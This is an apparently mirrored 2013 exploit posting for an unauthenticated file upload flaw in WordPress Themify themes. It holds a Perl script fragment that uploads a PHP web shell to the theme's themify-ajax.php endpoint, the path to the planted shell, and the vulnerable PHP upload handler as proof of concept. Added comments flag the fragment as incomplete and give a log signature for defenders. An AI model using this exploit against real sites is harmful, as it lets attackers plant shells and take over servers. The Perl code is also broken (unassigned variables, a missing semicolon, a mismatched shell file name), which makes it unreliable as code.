Thursday, November 21, 2013

WordPress Themify Themes File Upload Vulnerability


By on 3:23 AM

#!/usr/bin/perl
  
 
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
 
#my shell thumb_editor.php
 
 
 
  # Published request fragment, kept exactly as posted. It is not a complete
  # program: $site and $theme are never assigned in this excerpt, and the
  # statement below has no terminating semicolon.
  #
  # Target: the theme's themify/themify-ajax.php with upload=1 in the query
  # string, the flag the PHP excerpt on this page tests before calling
  # themify_upload().
  my $url = "http://".$site."wp-content/themes/".$theme."/themify/themify-ajax.php?upload=1"
    # Local file offered for upload. The name differs from the thumb_editor.php
    # mentioned elsewhere on the page; the page does not explain the mismatch.
    my $upspread = "wp_protect.php";
    my $ua  = LWP::UserAgent->new;
    # 20-second timeout on the HTTP client.
    $ua->timeout(20);
    # The form field name "Filedata" matches the $_FILES['Filedata'] key read by
    # the PHP handler shown on this page.
    my @parameters = ( Filedata => [ $upspread ]);                  
    # For defenders: in access logs this is a multipart/form-data POST to
    # .../themify/themify-ajax.php?upload=1. The fragment sets no cookie or
    # credential on the request.
    my $req = POST($url, Content_Type => 'form-data',
                         Content => \@parameters );
        # The response is stored but never inspected in the visible lines.
        my $res = $ua->request($req);
 
 
shell http://".$site."wp-content/themes/".$theme."/uploads/thumb_editor.php
 
 
 
 
Proof of concept:
 
 
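The upload handler below runs whenever the `upload` GET parameter is set. It does not check who is calling it, what type of file is uploaded, or where `$_POST['target']` points: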
 
        function themify_upload(){
                if(!empty($_FILES)) {
                        if(!isset($_POST['target']) || $_POST['target'] == ''){
                                $target = TEMPLATEPATH.'/uploads/';
                        } else {
                                $target = TEMPLATEPATH.'/'.$_POST['target'];
                        }      
                        $target = rtrim($target, "/");
                        $check = false;
                        if(!is_dir($target)){          
                                if(!mkdir($target, 0777, true)){
                                        echo "false";  
                                } else {
                                        $check = true; 
                                }
                        } else {
                                $check = true; 
                        }
                        if($check){
                                if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $target."/".str_replace(" ", "-", basename($_FILES['Filedata']['name'])))){
                                        echo str_replace(" ", "-", basename($_FILES['Filedata']['name']));
                                } else {
                                        echo "false";
                                }
                        }
                }
        }
        if($_GET['upload']){
                themify_upload();
        }
 
 
example
 
 
shell
 
 
dark crew friends    italians discovers
 
# 95ADD6B7FD4000D7   1337day.com [2013-11-21]   C03A23EEAA56B99F #
